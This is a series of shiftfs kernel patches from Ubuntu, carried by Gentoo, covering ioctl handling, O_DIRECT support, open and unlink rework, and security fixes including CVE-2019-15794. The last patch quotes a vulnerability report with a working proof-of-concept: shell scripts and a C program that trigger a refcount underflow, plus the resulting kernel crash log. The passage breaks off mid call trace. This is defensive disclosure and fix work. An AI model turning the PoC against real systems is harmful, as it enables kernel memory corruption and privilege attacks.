- 	case BTRFS_IOC_SUBVOL_CREATE:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_GETFLAGS:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_SETFLAGS:
-+		if (copy_from_user(&flags, arg, sizeof(flags)))
-+			return false;
-+
-+		if (flags & ~BTRFS_SUBVOL_RDONLY)
-+			return false;
-+
- 		return true;
- 	case BTRFS_IOC_SNAP_DESTROY:
- 		return true;
-@@ -1536,7 +1551,7 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOTTY;
- 	}
-@@ -1555,7 +1570,7 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		if (!in_ioctl_whitelist(cmd) ||
-+		if (!in_ioctl_whitelist(cmd, arg) ||
- 		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
- 			return -ENOIOCTLCMD;
- 	}
--- 
-2.39.2
-
-From cd66a65bbea66683404adadd7d61ec02d04ac21a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:46 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: add O_DIRECT support
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837223
-
-This enables O_DIRECT support for shiftfs if the underlay supports it.
-
-Currently shiftfs does not handle O_DIRECT even if the underlay supports
-it. This is blocking dqlite - an essential part of LXD - from profiting
-from the performance benefits of O_DIRECT on suitable filesystems when
-used with async io such as aio or io_uring.
-Overlayfs cannot support this directly since the upper filesystem in
-overlay can be any filesystem. So if the upper filesystem does not
-support O_DIRECT but the lower filesystem does you're out of luck.
-Shiftfs does not suffer from the same problem since there is no concept
-of an upper filesystem in the same way that overlayfs has it.
-Essentially, shiftfs is a transparent shim relaying everything to the
-underlay while overlayfs' upper layer is not (completely).
-
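-As a minimal sketch of what this unblocks (hypothetical path, error
-handling omitted; O_DIRECT generally requires suitably aligned buffers
-and I/O sizes):
-
- #define _GNU_SOURCE
- #include <fcntl.h>
- #include <stdlib.h>
- #include <unistd.h>
-
- int fd = open("/mnt/shiftfs/db.raft", O_RDWR | O_DIRECT);
- void *buf;
- /* Align to the logical block size, commonly 4096 bytes. */
- posix_memalign(&buf, 4096, 4096);
- pread(fd, buf, 4096, 0);
-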
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 3 +++
- 1 file changed, 3 insertions(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 49f6714e9f95..addaa6e21e57 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1126,6 +1126,9 @@ static int shiftfs_open(struct inode *inode, struct file *file)
- 	}
- 
- 	file->private_data = file_info;
-+	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
-+	file->f_mapping = realfile->f_mapping;
-+
- 	file_info->realfile = realfile;
- 	return 0;
- }
--- 
-2.39.2
-
-From 772a8ea3a85f0530a76bc8dbe4e91de92aa35180 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Fri, 19 Jul 2019 17:50:47 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: pass correct pointer down
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1837231
-
-This used to pass an unsigned long to copy_from_user() instead of a
-void __user * pointer. This will produce a warning with a sufficiently
-advanced compiler.
-
-Cc: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index addaa6e21e57..9006201c243d 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1529,7 +1529,7 @@ static bool in_ioctl_whitelist(int flag, unsigned long arg)
- 	case BTRFS_IOC_SUBVOL_GETFLAGS:
- 		return true;
- 	case BTRFS_IOC_SUBVOL_SETFLAGS:
--		if (copy_from_user(&flags, arg, sizeof(flags)))
-+		if (copy_from_user(&flags, argp, sizeof(flags)))
- 			return false;
- 
- 		if (flags & ~BTRFS_SUBVOL_RDONLY)
--- 
-2.39.2
-
-From ca8b1596f4e2a5a3c8ee7b7cb45d4703b329c891 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Thu, 29 Aug 2019 20:45:07 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix buggy unlink logic
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1841977
-
-The way we messed with setting i_nlink was brittle and wrong. We used to
-set the i_nlink of the shiftfs dentry to be deleted to the i_nlink count
-of the underlay dentry of the directory it resided in, which makes no
-sense whatsoever. We also missed drop_nlink(), which is crucial since
-i_nlink affects whether a dentry is cleaned up on dput().
-With this I cannot reproduce the bug anymore where shiftfs misleads zfs
-into believing that a deleted file cannot be removed from disk because
-it is still referenced.
-
-Fixes: commit 87011da41961 ("shiftfs: rework and extend")
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 ++++++++++-----
- 1 file changed, 10 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 9006201c243d..e80db9480b5c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -585,6 +585,7 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
-+	struct inode *inode = d_inode(dentry);
- 	int err;
- 	const struct cred *oldcred;
- 
-@@ -594,15 +595,19 @@ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
- 		err = vfs_rmdir(loweri, lowerd);
- 	else
- 		err = vfs_unlink(loweri, lowerd, NULL);
--	inode_unlock(loweri);
- 	revert_creds(oldcred);
- 
--	shiftfs_copyattr(loweri, dir);
--	set_nlink(d_inode(dentry), loweri->i_nlink);
--	if (!err)
-+	if (!err) {
- 		d_drop(dentry);
- 
--	set_nlink(dir, loweri->i_nlink);
-+		if (rmdir)
-+			clear_nlink(inode);
-+		else
-+			drop_nlink(inode);
-+	}
-+	inode_unlock(loweri);
-+
-+	shiftfs_copyattr(loweri, dir);
- 
- 	return err;
- }
--- 
-2.39.2
-
-From 81445d2871aef886eabb56c7f124d491f445fcc7 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Fri, 30 Aug 2019 14:14:31 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: mark slab objects
- SLAB_RECLAIM_ACCOUNT
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1842059
-
-Shiftfs does not mark its slab cache as reclaimable. While this is not
-a big deal, it is not nice to the kernel in general. The shiftfs cache is
-not so important that it can't be reclaimed.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e80db9480b5c..a21cb473e000 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2108,7 +2108,7 @@ static int __init shiftfs_init(void)
- {
- 	shiftfs_file_info_cache = kmem_cache_create(
- 		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
- 	if (!shiftfs_file_info_cache)
- 		return -ENOMEM;
- 
--- 
-2.39.2
-
-From 3d0e90c90e6b1b915b9ac760c865529b28cf1cdd Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 2 Oct 2019 09:57:14 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: rework how shiftfs opens files
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1846265
-
-This commit simplifies how shiftfs opens files, both regular files and
-directories.
-
-In the first iteration, we implemented a kmem cache for struct
-shiftfs_file_info which stashed away a struct path and the struct file
-for the underlay. The path however was never used anywhere so the struct
-shiftfs_file_info and therefore the whole kmem cache can go away.
-Instead we move to the same model as overlayfs and just stash away the
-struct file for the underlay in file->private_data of the shiftfs struct
-file.
-Additionally, we split the .open method for files and directories.
-Similar to overlayfs, .open for regular files uses open_with_fake_path()
-which ensures that it doesn't contribute to the open file count (since
-this would mean we'd count double). The .open method for directories
-however uses dentry_open(), which contributes to the open file count.
-
-The basic logic for opening files is unchanged. The main point is to
-ensure that a reference to the underlay's dentry is kept through struct
-path.
-
-Various bits and pieces of this were cooked up in discussions Seth and I
-had in Paris.
-
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 105 +++++++++++++++++++++++----------------------------
- 1 file changed, 47 insertions(+), 58 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21cb473e000..55bb32b611f2 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -31,13 +31,6 @@ struct shiftfs_super_info {
- 	unsigned int passthrough_mark;
- };
- 
--struct shiftfs_file_info {
--	struct path realpath;
--	struct file *realfile;
--};
--
--struct kmem_cache *shiftfs_file_info_cache;
--
- static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 			       umode_t mode, dev_t dev, struct dentry *dentry);
- 
-@@ -1042,21 +1035,21 @@ static const struct inode_operations shiftfs_symlink_inode_operations = {
- };
- 
- static struct file *shiftfs_open_realfile(const struct file *file,
--					  struct path *realpath)
-+					  struct inode *realinode)
- {
--	struct file *lowerf;
--	const struct cred *oldcred;
-+	struct file *realfile;
-+	const struct cred *old_cred;
- 	struct inode *inode = file_inode(file);
--	struct inode *loweri = realpath->dentry->d_inode;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
- 	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
- 
--	oldcred = shiftfs_override_creds(inode->i_sb);
--	/* XXX: open_with_fake_path() not gauranteed to stay around, if
--	 * removed use dentry_open() */
--	lowerf = open_with_fake_path(realpath, file->f_flags, loweri, info->creator_cred);
--	revert_creds(oldcred);
-+	old_cred = shiftfs_override_creds(inode->i_sb);
-+	realfile = open_with_fake_path(&realpath, file->f_flags, realinode,
-+				       info->creator_cred);
-+	revert_creds(old_cred);
- 
--	return lowerf;
-+	return realfile;
- }
- 
- #define SHIFTFS_SETFL_MASK (O_APPEND | O_NONBLOCK | O_NDELAY | O_DIRECT)
-@@ -1096,8 +1089,7 @@ static int shiftfs_change_flags(struct file *file, unsigned int flags)
- 
- static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	lowerfd->flags = 0;
- 	lowerfd->file = realfile;
-@@ -1111,51 +1103,57 @@ static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
- 
- static int shiftfs_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_super_info *ssi = inode->i_sb->s_fs_info;
--	struct shiftfs_file_info *file_info;
- 	struct file *realfile;
--	struct path *realpath;
- 
--	file_info = kmem_cache_zalloc(shiftfs_file_info_cache, GFP_KERNEL);
--	if (!file_info)
--		return -ENOMEM;
--
--	realpath = &file_info->realpath;
--	realpath->mnt = ssi->mnt;
--	realpath->dentry = file->f_path.dentry->d_fsdata;
--
--	realfile = shiftfs_open_realfile(file, realpath);
--	if (IS_ERR(realfile)) {
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
-+	realfile = shiftfs_open_realfile(file, inode->i_private);
-+	if (IS_ERR(realfile))
- 		return PTR_ERR(realfile);
--	}
- 
--	file->private_data = file_info;
-+	file->private_data = realfile;
- 	/* For O_DIRECT dentry_open() checks f_mapping->a_ops->direct_IO. */
- 	file->f_mapping = realfile->f_mapping;
- 
--	file_info->realfile = realfile;
- 	return 0;
- }
- 
--static int shiftfs_release(struct inode *inode, struct file *file)
-+static int shiftfs_dir_open(struct inode *inode, struct file *file)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile;
-+	const struct cred *oldcred;
-+	struct dentry *lowerd = file->f_path.dentry->d_fsdata;
-+	struct shiftfs_super_info *info = inode->i_sb->s_fs_info;
-+	struct path realpath = { .mnt = info->mnt, .dentry = lowerd };
-+
-+	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
-+	realfile = dentry_open(&realpath, file->f_flags | O_NOATIME,
-+			       info->creator_cred);
-+	revert_creds(oldcred);
-+	if (IS_ERR(realfile))
-+		return PTR_ERR(realfile);
- 
--	if (file_info) {
--		if (file_info->realfile)
--			fput(file_info->realfile);
-+	file->private_data = realfile;
- 
--		kmem_cache_free(shiftfs_file_info_cache, file_info);
--	}
-+	return 0;
-+}
-+
-+static int shiftfs_release(struct inode *inode, struct file *file)
-+{
-+	struct file *realfile = file->private_data;
-+
-+	if (realfile)
-+		fput(realfile);
- 
- 	return 0;
- }
- 
-+static int shiftfs_dir_release(struct inode *inode, struct file *file)
-+{
-+	return shiftfs_release(inode, file);
-+}
-+
- static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	return vfs_llseek(realfile, offset, whence);
- }
-@@ -1274,8 +1272,7 @@ static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
- 
- static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- {
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 	const struct cred *oldcred;
- 	int ret;
- 
-@@ -1671,8 +1668,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- {
- 	const struct cred *oldcred;
- 	int err = -ENOTDIR;
--	struct shiftfs_file_info *file_info = file->private_data;
--	struct file *realfile = file_info->realfile;
-+	struct file *realfile = file->private_data;
- 
- 	oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
- 	err = iterate_dir(realfile, ctx);
-@@ -1698,13 +1694,13 @@ const struct file_operations shiftfs_file_operations = {
- };
- 
- const struct file_operations shiftfs_dir_operations = {
-+	.open			= shiftfs_dir_open,
-+	.release		= shiftfs_dir_release,
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
- 	.llseek			= shiftfs_dir_llseek,
--	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
--	.release		= shiftfs_release,
- 	.unlocked_ioctl		= shiftfs_ioctl,
- };
- 
-@@ -2106,19 +2102,12 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
--	shiftfs_file_info_cache = kmem_cache_create(
--		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
--		SLAB_RECLAIM_ACCOUNT | SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
--	if (!shiftfs_file_info_cache)
--		return -ENOMEM;
--
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
--	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
--- 
-2.39.2
-
-From 0afd6d19d12a42d7905110a41cdb3815e023467c Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Wed, 6 Nov 2019 09:38:57 -0600
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Restore vm_file value when lower fs
- mmap fails
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850994
-
-shiftfs_mmap() overwrites vma->vm_file before calling the lower
-filesystem mmap but does not restore the original value on
-failure. This means it is giving a pointer to the lower fs file
-back to the caller with no reference, which is a bad practice.
-However, it does not lead to any issues with upstream kernels as
-no caller accesses vma->vm_file after call_mmap().
-
-With the aufs patches applied the story is different. Whereas
-mmap_region() previously fput a local variable containing the
-file it assigned to vm_file, it now calls vma_fput() which will
-fput vm_file, for which it has no reference, and the reference
-for the original vm_file is not put.
-
-Fix this by restoring vma->vm_file to the original value when the
-mmap call into the lower fs fails.
-
-CVE-2019-15794
-
-Reported-by: Jann Horn <jannh@google.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 15 +++++++++++----
- 1 file changed, 11 insertions(+), 4 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 55bb32b611f2..57d84479026b 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1289,10 +1289,17 @@ static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
- 
- 	shiftfs_file_accessed(file);
- 
--	if (ret)
--		fput(realfile); /* Drop refcount from new vm_file value */
--	else
--		fput(file); /* Drop refcount from previous vm_file value */
-+	if (ret) {
-+		/*
-+		 * Drop refcount from new vm_file value and restore original
-+		 * vm_file value
-+		 */
-+		vma->vm_file = file;
-+		fput(realfile);
-+	} else {
-+		/* Drop refcount from previous vm_file value */
-+		fput(file);
-+	}
- 
- 	return ret;
- }
--- 
-2.39.2
-
-From 5b548337ff886dfb00ec3a142693226394673126 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:22:28 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: setup correct s_maxbytes limit
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849482
-
-Set the s_maxbytes limit to MAX_LFS_FILESIZE.
-Currently shiftfs needlessly limits the maximum size for fallocate(),
-causing calls such as fallocate --length 2GB ./file to fail. This
-limitation is arbitrary since it's not caused by the underlay but
-rather by shiftfs itself capping the s_maxbytes. This causes bugs such
-as the one reported in [1].
-
-[1]: https://github.com/lxc/lxd/issues/6333
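-
-The equivalent C call that used to fail is roughly (hypothetical file,
-any length above the old arbitrary cap, error handling omitted):
-
- #define _GNU_SOURCE
- #include <fcntl.h>
-
- int fd = open("./file", O_WRONLY | O_CREAT, 0644);
- fallocate(fd, 0, 0, 2ULL << 30); /* 2 GiB, no longer rejected */
-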
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 57d84479026b..6a2b5e3d0d53 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -2064,6 +2064,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	inode->i_private = dentry->d_inode;
- 
- 	sb->s_magic = SHIFTFS_MAGIC;
-+	sb->s_maxbytes = MAX_LFS_FILESIZE;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--- 
-2.39.2
-
-From fa7001e866380a4d2f45022295b6db1fd0cf12c5 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian.brauner@ubuntu.com>
-Date: Wed, 23 Oct 2019 14:23:50 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: drop CAP_SYS_RESOURCE from effective
- capabilities
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1849483
-
-Currently shiftfs allows exceeding project quota and reserved space on
-e.g. ext2. See [1] and especially [2] for a bug report. This is very
-much not what we want. Quotas and reserved space settings set on the
-host need to be respected. The cause for this issue is overriding the
-credentials with the superblock creator's credentials whenever we
-perform operations such as fallocate() or writes while retaining
-CAP_SYS_RESOURCE.
-
-The fix is to drop CAP_SYS_RESOURCE from the effective capability set
-after we have made a copy of the superblock creator's credential at
-superblock creation time. This very likely gives us more security than
-we had before and the regression potential seems limited. I would like
-to try this approach first before coming up with something potentially
-more sophisticated. I don't see why CAP_SYS_RESOURCE should become a
-limiting factor in most use-cases.
-
-[1]: https://github.com/lxc/lxd/issues/6333
-[2]: https://github.com/lxc/lxd/issues/6333#issuecomment-545154838
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Connor Kuehl <connor.kuehl@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 8 ++++++--
- 1 file changed, 6 insertions(+), 2 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 6a2b5e3d0d53..0d6ce377b07c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1958,6 +1958,7 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
-+		struct cred *cred_tmp;
- 		struct super_block *lower_sb = path.mnt->mnt_sb;
- 
- 		/* to mark a mount point, must root wrt lower s_user_ns */
-@@ -2012,11 +2013,14 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
--		sbinfo->creator_cred = prepare_creds();
--		if (!sbinfo->creator_cred) {
-+		cred_tmp = prepare_creds();
-+		if (!cred_tmp) {
- 			err = -ENOMEM;
- 			goto out_put_path;
- 		}
-+		/* Don't override disk quota limits or use reserved space. */
-+		cap_lower(cred_tmp->cap_effective, CAP_SYS_RESOURCE);
-+		sbinfo->creator_cred = cred_tmp;
- 	} else {
- 		/*
- 		 * This leg executes if we're admin capable in the namespace,
--- 
-2.39.2
-
-From a73880c13fc011fba13bfbf3197b98500c8c4906 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Fri, 1 Nov 2019 10:41:03 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl
- handling
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1850867
-
-shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
-file from the lower filesystem without taking an additional
-reference to that file. After the btrfs ioctl completes this fd
-is closed, which then puts a reference to that file, leading to a
-refcount underflow. Original bug report and test case from Jann
-Horn is below.
-
-Fix this, and at the same time simplify the management of the fd
-to the lower file for the ioctl. In
-shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
-the lower file and set FDPUT_FPUT so that this reference will get
-dropped on fdput() in error paths. Do not maintain the struct fd
-in the caller, as the fd installed in the fd table is
-sufficient to properly clean up. Finally, remove the fdput() in
-shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
-__close_fd() call.
-
-Original report from Jann Horn:
-
-In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
-
- src = fdget(oldfd);
- if (!src.file)
-  return -EINVAL;
- // src holds one reference (assuming multithreaded execution)
-
- ret = shiftfs_real_fdget(src.file, lfd);
- // lfd->file is a file* now, but shiftfs_real_fdget didn't take any
- // extra references
- fdput(src);
- // this drops the only reference we were holding on src, and src was
- // the only thing holding a reference to lfd->file. lfd->file may be
- // dangling at this point.
- if (ret)
-  return ret;
-
- *newfd = get_unused_fd_flags(lfd->file->f_flags);
- if (*newfd < 0) {
-  // always a no-op
-  fdput(*lfd);
-  return *newfd;
- }
-
- fd_install(*newfd, lfd->file);
- // fd_install() consumes a counted reference, but we don't hold any
- // counted references. so at this point, if lfd->file hasn't been freed
- // yet, its refcount is one lower than it ought to be.
-
- [...]
-
- // the following code is refcount-neutral, so the refcount stays one too
- // low.
- if (ret)
-  shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-
-shiftfs_real_fdget() is implemented as follows:
-
-static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
-{
- struct shiftfs_file_info *file_info = file->private_data;
- struct file *realfile = file_info->realfile;
-
- lowerfd->flags = 0;
- lowerfd->file = realfile;
-
- /* Did the flags change since open? */
- if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
-  return shiftfs_change_flags(lowerfd->file, file->f_flags);
-
- return 0;
-}
-
-Therefore, the following PoC will cause reference count overdecrements; I ran it
-with SLUB debugging enabled and got the following splat:
-
-=======================================
-user@ubuntu1910vm:~/shiftfs$ cat run.sh
-sync
-unshare -mUr ./run2.sh
-t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
-set -e
-
-mkdir -p mnt/tmpfs
-mkdir -p mnt/shiftfs
-mount -t tmpfs none mnt/tmpfs
-mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
-mount|grep shift
-touch mnt/tmpfs/foo
-gcc -o ioctl ioctl.c -Wall
-./ioctl
-user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
-
-int main(void) {
-  int root = open("mnt/shiftfs", O_RDONLY);
-  if (root == -1) err(1, "open shiftfs root");
-  int foofd = openat(root, "foo", O_RDONLY);
-  if (foofd == -1) err(1, "open foofd");
-  struct btrfs_ioctl_vol_args iocarg = {
-    .fd = foofd
-  };
-  ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
-  sleep(1);
-  void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
-  if (map != MAP_FAILED) munmap(map, 0x1000);
-}
-user@ubuntu1910vm:~/shiftfs$ ./run.sh
-none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
-/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
-[ 183.463452] general protection fault: 0000 [#1] SMP PTI
-[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
-[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
-[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
-[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
-[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
-[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
-[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
-[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
-[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
-[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
-[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
-[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
-[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
-[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
-[ 183.510580] Call Trace:
-[ 183.511396] mmap_region+0x417/0x670
-[ 183.512592] do_mmap+0x3a8/0x580
-[ 183.513655] vm_mmap_pgoff+0xcb/0x120
-[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
